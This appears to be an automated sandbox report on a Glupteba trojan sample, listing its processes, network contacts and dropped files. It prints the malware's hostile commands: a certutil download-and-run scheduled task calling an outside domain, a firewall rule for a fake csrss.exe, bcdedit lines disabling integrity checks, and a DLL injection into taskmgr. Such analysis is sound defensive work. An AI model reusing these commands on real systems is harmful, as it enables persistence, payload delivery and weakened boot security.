Malware Analysis Report

2025-08-05 12:47

Sample ID 240122-jnxr6sbhg4
Target 6f1f130741c10e884ac91387ba6f1671
SHA256 4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03
Tags
glupteba metasploit backdoor dropper evasion loader trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03

Threat Level: Known bad

The file 6f1f130741c10e884ac91387ba6f1671 was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader trojan

Glupteba

MetaSploit

Glupteba payload

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Program crash

Creates scheduled task(s)

GoLang User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-22 07:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-22 07:49

Reported

2024-01-22 07:52

Platform

win7-20231215-en

Max time kernel

1s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122074937.log C:\Windows\Logs\CBS\CbsPersist_20240122074937.cab

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /124-124

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 f07d4c85-f10f-4500-992e-9c511decba96.ninhaine.com udp
US 8.8.8.8:53 server4.ninhaine.com udp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 server4.2makestorage.com udp

Files

memory/2124-0-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-1-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-2-0x0000000004DA0000-0x00000000056C6000-memory.dmp

memory/2124-3-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2972-5-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2124-4-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2124-6-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-7-0x0000000004DA0000-0x00000000056C6000-memory.dmp

memory/2972-8-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2972-9-0x0000000000400000-0x00000000030F3000-memory.dmp

\Windows\rss\csrss.exe

MD5 499eabd4f1dff82cb81cb4c3df44da76
SHA1 2765b4730b364627585119311b0fce87ef9c6e45
SHA256 296f916a6ac6f5e77bd15b649435d11de60fc543bfe0cba3b9c42614ddfbae67
SHA512 e4585c28abd47404917e567f8ce3a3208cc989d93b27cc600948933d1fcd29b4576e0ed8346ee14079f1abd363652164942cee14f710976461a738102beb3477

\Windows\rss\csrss.exe

MD5 6aa89987b804232510d11688123a8c11
SHA1 d64c4e47737a23425f250b1a82ac4f5f2f8a0f27
SHA256 00ed550c939809e40115afd5a321c932fd03650435e453aac9e0ab6c154b3aad
SHA512 c67d6d106735ddf9ec7067ef35295699f113104209e5c33fdc4b51e8835ae4befca59ec98933e93020e502fea3c67eaf34e40a3452f600ee19cb98211c63ec1b

C:\Windows\rss\csrss.exe

MD5 3fe278eb70b96c11868a3134e1c4ff6f
SHA1 8d962a63dea82f8edbbf9bd361003cceb8464cba
SHA256 a348f3052917186e1031aa220b3a29eca010d710f9cca8bfab3046108be4349d
SHA512 69012fd021aacc73365a205beacf88848de295a6474a7a2b4cc76c6d657838c90cb6e991bc64ee939df2337586e527a0ea30f2ab8d71f1248d01906b36143e3e

memory/2972-17-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 fedef76d64a91a88ebb634be8f4db93a
SHA1 907a52726c41cd6f85cd71b7e959c41954d1e0a5
SHA256 762bdf38f5a4db112a6fbade2705683ebec7c8ecd14877980d8a9e65d10521c6
SHA512 22bdd544d20eb1c977089d36cc82f7acd8493a0f4dfe924a7d8759ffe8f18fa549d10c26c2fe344eef6535a8072af2c83a42bfe79971fb1f9efaad0e6b63ccf7

memory/2548-19-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2972-20-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2548-21-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2548-22-0x0000000004E80000-0x00000000057A6000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 2c27b040963e92ed4e5a0a1dc86b62f2
SHA1 40008cb09009e199e7c2834f29243933f525914f
SHA256 bebf3ef90b5afcadbceaa3f6d31ec605e887771ca0ca080610302d4fc45a4ddb
SHA512 af213a4a27759419488b4fdcd6ded9b79ae17f5b97828f39c7680122554508003e132bc6e91bc9a7421127af29f313b24ceb0726ef3ac4305c953be1cbe67aca

memory/2548-24-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 74942d6ff7cf9cef6a929e6228c6c30b
SHA1 df75f4f9be14926a7ff62c42cc016d3a7058ab7d
SHA256 fda06ef0fbfa14278810a43cd9675aa09bcf6b41a500bc8dc7e8b643f4f8933b
SHA512 20e6f5a3ac3013661e21a943d367afebe7218df808d8a991facbae6246d55b8c446e089975cf6d09919f8f699bb08771d6e0777e62aae39897728c4abf39bb69

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 4b25a3c843dd6c49f625b914b0facc65
SHA1 e518e8f8e25e0d3410954b9e04d456c46d24f54b
SHA256 a4a3ee25c5644d1c406ce750991a1e8e69dc45a60936bad0f9a7c8339ef6113b
SHA512 31f1f0e94755f0486fa39c6ba6e98ef8ed4c453a0a5d5a3e60b943110aea3f189fa06674373ac25b64683c8d9f0cb7da62c6bd64e6b340e0ec436e5214e2c39c

memory/2748-41-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 3b9d4a06fa57529e13413f6d0cf46b63
SHA1 fa6f1391f42647cdc9658eb6d05d0b77afc660f5
SHA256 6f17cbec30d5f10a54caa28bf51acc2a6177874a5044b4f11e2a4d1fb45105be
SHA512 48f63d24665c842e800cdc935db795b39e032105804ffa0903c6aa6d39fd8db76e4a7a70cc0644b9c3b47c3555ab037ddf88acfa2e485d86354cbb04fd181571

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 95dbc04b5f2d043c9c7443bf470086a3
SHA1 943883ffe35711841b401520869e53fdab395e78
SHA256 6d0a948892711fdf81fd0c4cb8d4a0cb6ecbb2a936b31184713331bea6871ce5
SHA512 9dee05936d7f6913319329a029c2c40a2a2fd041b586a4662c05b4653ac16745b7ebc5f8538da4df3c1b9b4011bd4aed0b6a4b17e4211dd2d93f03ebbb5dec36

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 c0c77b59c5c75aecfbed31b0a4d5040f
SHA1 691cb3493a4cfe9dd3f58036655717b6c8da61e1
SHA256 92342a944b20cf24028d6c24c0bbbe2b7afc3519f6bddea15575547453fe70fc
SHA512 b0538141a9faac53ad2cc498d7a6dd40d636384c5db1c32cabf2ee9ebfbe3a099646f33f0f6b009918aa68400426c907de40b95689710917dcfe2c439288a704

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 8bb42841aea78353b557b14cc8caaf2e
SHA1 83357aebec0b7eb5064df71e2adac7f849012e1d
SHA256 43a71be8749fa13e6b7e1043aa16c91434fb0b877e01dddc76a83caf3b1bd6fb
SHA512 83634b429bc741b23b368b510e0eff21da1fccc32ba7e22baf2722b6949d76de3b9cf1301c73aa391ababb075252b1688864cd9f5f9ca3a561695a34ecda6a40

memory/2748-55-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 d89216df6c609e1e65bc9d9fd7eaa50c
SHA1 c411ef43e96321f9458b840a07f8d5368d19056b
SHA256 819baa1197c8f66f68f1c3da68a3e11e7e71c4a8624a4ddef8a3d577ea70408e
SHA512 c3458057119167d1fc973ad11cf828af2239761b5bd6970b7904110aacabfdcc77eab98cc41fcbe671c910e93cb2c4007aecf4984b5edfb08cd129ab3849aac0

C:\Windows\Temp\Tar7929.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Windows\Temp\Cab78E7.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 51f4aa589d408c2a627caac66cb2584e
SHA1 c2bf0001b7f48eec67e4813243a27bdc42e05a64
SHA256 f40e3b92dd02cd4293b7422bdd607226ea9fad2c2eb55a651d80109c273de673
SHA512 19b12b3b8b1b6109cd38e5e79e563952e8881767a311a958fbc526dc48fa3febf2fe23b67c8b197c04cc13a6e9479cd1d2a1a6c2d88f69a88b13719a1262f708

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a9c83c96196a21934eaed36566618795
SHA1 db7972224cb8b8b84c92aff05c42b69ea4b29ecf
SHA256 996cd2357911d3813ca5f2a8196d678478d0bb09a5aec29614d78729f85855eb
SHA512 4da6feb77c64cf6de741926e5763dd6470c55a6d3dac9e33f1272d6de01fe40b0f2f6f2aadb72fdba481245944f7fcf430fba5e1c51ffd70eebde2cd392b312a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 643309e4f3f5942508b336c0effd1f5e
SHA1 aac8c8cd90ad5df42599c07c3afdafb599f5a99f
SHA256 630c96332e449f3ed6d2c39bf0d505a5903ec8efcf837dfed74d7b82ae256144
SHA512 a5fd5cb185d0f55d94bdf5a9fb827b9718c0a547854c04e565b08492a12223a04ae675ea5890b34105df839c37b76b3895026a16770c92122525c27b3669d232

memory/2548-248-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-252-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2548-253-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 e955c94aeb61e140041a36add84b3892
SHA1 f78eb1719a849e342091c6dc22eea460f6872ae5
SHA256 0f7fbfa8efb1954f08b8a3caf56c72a5d3b6e7c29b70850f363d657fa318f8cf
SHA512 661f5be3c15eab627e2788d01dadb778451c7bf184484c228263f8c46791a18db59fd0bcf2fd4a893ea9720295ac549806bbd9509bc0fb930d2ebe0f237116aa

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 c05fb950baacf9ce156280ea8407c203
SHA1 422c0d5b242dfbacd8999be8b00807089f41c1a7
SHA256 1a648175286d173facd9645e706393d13abb53feb76b2aa17a4f68e0f683af01
SHA512 e90991e19923e242bbf0234412e58eb3f0499786382db7e2a1bbf1bf1eae7a8e558ac54939232bb07f7eb59f5e1aa74cb0705cc50487cae5bbd3df0cdb939da2

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 02f3936dbdb185641196388ea56f8060
SHA1 b66c9fbf39b6be44e9fe9ffc8caff260ab74ee64
SHA256 7473b90564b881e251dd89d33b31bb18008f5c51d2ddadb2a0437d111e8bbe4e
SHA512 1c00b654a85f359b168b3c88318598c47ec88e34490fe368efdbcfed6220703f7d11f3595937f807fb817eea65290ffcdd8b18d605d3d7bc6f7cb6d2a7d27335

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7b57b837e31b145d77f4d575df1b8c5
SHA1 8fd19ae163f3d4e53b2e1459fbe98bbe43310784
SHA256 27dde6fca4c2dba5f681cf252a57ed4e1d587f386cce783d0c98ea1fa88812e6
SHA512 9dd507b32ce0cd549497ab52a643ba5917f72e86f9ce5b58ca5c6ed684172d8097921791790282455dad2997068604c161f1d2db158c1374bee037db638e8a0b

memory/2548-305-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2548-331-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-337-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-338-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-363-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-364-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-365-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-366-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-367-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-368-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-369-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-370-0x0000000000400000-0x00000000030F3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 07:49

Reported

2024-01-22 07:52

Platform

win10v2004-20231222-en

Max time kernel

3s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
